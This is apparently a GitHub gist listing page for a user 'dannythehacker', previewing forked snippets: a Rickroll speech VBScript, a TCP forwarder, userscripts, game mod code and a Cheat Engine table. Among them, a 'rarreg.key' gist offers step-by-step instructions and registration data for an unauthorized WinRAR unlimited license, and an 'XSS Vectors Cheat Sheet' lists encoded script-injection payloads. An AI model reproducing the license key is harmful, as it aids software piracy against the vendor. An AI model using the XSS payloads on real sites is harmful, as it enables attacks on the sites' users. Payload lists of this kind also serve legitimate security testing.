Skip to content

Instantly share code, notes, and snippets.

set speech = Wscript.CreateObject("SAPI.spVoice")
speech.speak "We're no strangersto love"
speech.speak "You know the rules and so do I"
speech.speak "A full commitment's what I'm thinking of"
speech.speak "You wouldn't get this from any other guy"
speech.speak ""
speech.speak "I just wanna tell you how I'm feeling"
speech.speak "Gotta make you understand"
speech.speak ""
speech.speak "Never gonna give you up"
@dannythehacker
dannythehacker / forwarder.py
Created August 8, 2023 19:38 — forked from LiveOverflow/forwarder.py
TCP Forwarder
import socket
import select
from logzero import logger
# python forwarder.py localhost:1337 ipinfo.io:80
# curl -v http://localhost.com:1337 -H "Host: ipinfo.io"
# video: https://www.youtube.com/watch?v=32KKwgF67Ho
class Forwarder:
@dannythehacker
dannythehacker / rarreg.key
Created February 4, 2023 03:40 — forked from MuhammadSaim/rarreg.key
Step 1: Create a file called rarreg.key Step 2: Paste into the file the raw content of this gist Step 3: Go to Winrar install directory (by default => c:\ProgramFiles\WinRAR\ ) Step 4: Paste the rarreg.key into WinRAR directory Step 5: Enjoy
RAR registration data
WinRAR
Unlimited Company License
UID=4b914fb772c8376bf571
6412212250f5711ad072cf351cfa39e2851192daf8a362681bbb1d
cd48da1d14d995f0bbf960fce6cb5ffde62890079861be57638717
7131ced835ed65cc743d9777f2ea71a8e32c7e593cf66794343565
b41bcf56929486b8bcdac33d50ecf773996052598f1f556defffbd
982fbe71e93df6b6346c37a3890f3c7edc65d7f5455470d13d1190
6e6fb824bcf25f155547b5fc41901ad58c0992f570be1cf5608ba9
@dannythehacker
dannythehacker / SteamSendaMessage.user.js
Created November 21, 2022 00:07 — forked from MalikAQayum/SteamSendaMessage.user.js
adds the ability to send a message to someone that is not your friend, through the "more" button on the steam profile.
// ==UserScript==
// @name Steam Send a Message
// @namespace MalikQayum
// @version 0.3
// @description adds the ability to send a message to someone that is not your friend, through the "more" button on the steam profile.
// @author MalikQayum
// @include /^https?://steamcommunity\.com/(id|profiles)/*/
// @grant none
// ==/UserScript==
@dannythehacker
dannythehacker / aternosAntiAntiadblock.user.js
Created November 20, 2022 06:50 — forked from DvilMuck/aternosAntiAntiadblock.user.js
Aternos Anti Anti Adblock userscript for Aternos.org
// ==UserScript==
// @name Aternos Anti Anti-adblock
// @namespace r0630hh1edcuum5397kimyc0ucwy2h3psn4c6r1u4j
// @version 0.1.16
// @description Fuck anti-adblock from the free hosting minecraft servers Aternos.org. Parry this you filthy casual!
// @author Angry Developer against excessive ADs
// @source https://gist.github.com/DvilMuck/f2b14f3f65e8f22974d781277158f82a
// @supportURL https://gist.github.com/DvilMuck/f2b14f3f65e8f22974d781277158f82a
// @updateURL https://gist.github.com/DvilMuck/f2b14f3f65e8f22974d781277158f82a/raw/aternosAntiAntiadblock.user.js
// @downloadURL https://gist.github.com/DvilMuck/f2b14f3f65e8f22974d781277158f82a/raw/aternosAntiAntiadblock.user.js
@dannythehacker
dannythehacker / Ravenfield Gold
Created September 27, 2022 23:05 — forked from iwanPlays/Ravenfield Gold
BlipBloop's Gold Mod, iwanPlays' modifications https://youtube.com/iwanPlays
BlipBloop's Gold Mod code
with iwanPlays' modifications
WEAPON:
START:
for (int i = 0; i < base.GetComponentsInChildren<MeshRenderer>().Length; i++)
{
for (int j = 0; j < base.GetComponentsInChildren<MeshRenderer>()[i].materials.Length; j++)
{
@dannythehacker
dannythehacker / Coffie-Ravenfield-v03.CT
Created September 27, 2022 23:05 — forked from iwanPlays/Coffie-Ravenfield-v03.CT
Cheat Table for Ravenfield, see https://youtu.be/sHoV_CTUyJ0 (MANY THANKS TO COFFIE!)
<?xml version="1.0" encoding="utf-8"?>
<CheatTable CheatEngineTableVersion="21">
<CheatEntries>
<CheatEntry>
<ID>1</ID>
<Description>"pointerscan result"</Description>
<LastState Value="5" Activated="1" RealAddress="19BB0124"/>
<VariableType>4 Bytes</VariableType>
<Address>"mono.dll"+0020B9D4</Address>
<Offsets>
--[[
DEX Main Script
Created by: Moon and Courtney
RASPBERRY PI IS A SKIDDY SKID AF
--]]
-- Metas
local Services = setmetatable({},{
@dannythehacker
dannythehacker / xss_vectors.txt
Created November 19, 2018 01:39 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">